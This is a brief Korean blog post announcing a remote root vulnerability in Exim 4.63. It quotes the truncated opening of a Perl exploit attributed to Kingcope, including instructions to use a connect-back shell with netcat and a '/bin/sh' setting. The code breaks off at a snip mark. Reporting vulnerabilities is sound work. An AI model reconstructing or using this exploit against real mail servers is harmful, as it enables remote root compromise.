[태그:] exim

Exim 4.63 Remote Exploit

Exim 4.63 버전에서 리모트에서 root 권한 획득이 가능한 취약점이 발표되었습니다. 리모트에서 rooting이 가능한 취약점은 오랜만에 보는거 같네요.[code]#Exim 4.63 (RedHat/Centos/Debian) Remote Root Exploit by Kingcope#Modified perl version of metasploit module =for comment use this connect back shell as "trojanurl" and be sure to setup a netcat, —snip— $system = ‘/bin/sh’;br>$ARGC=@ARGV;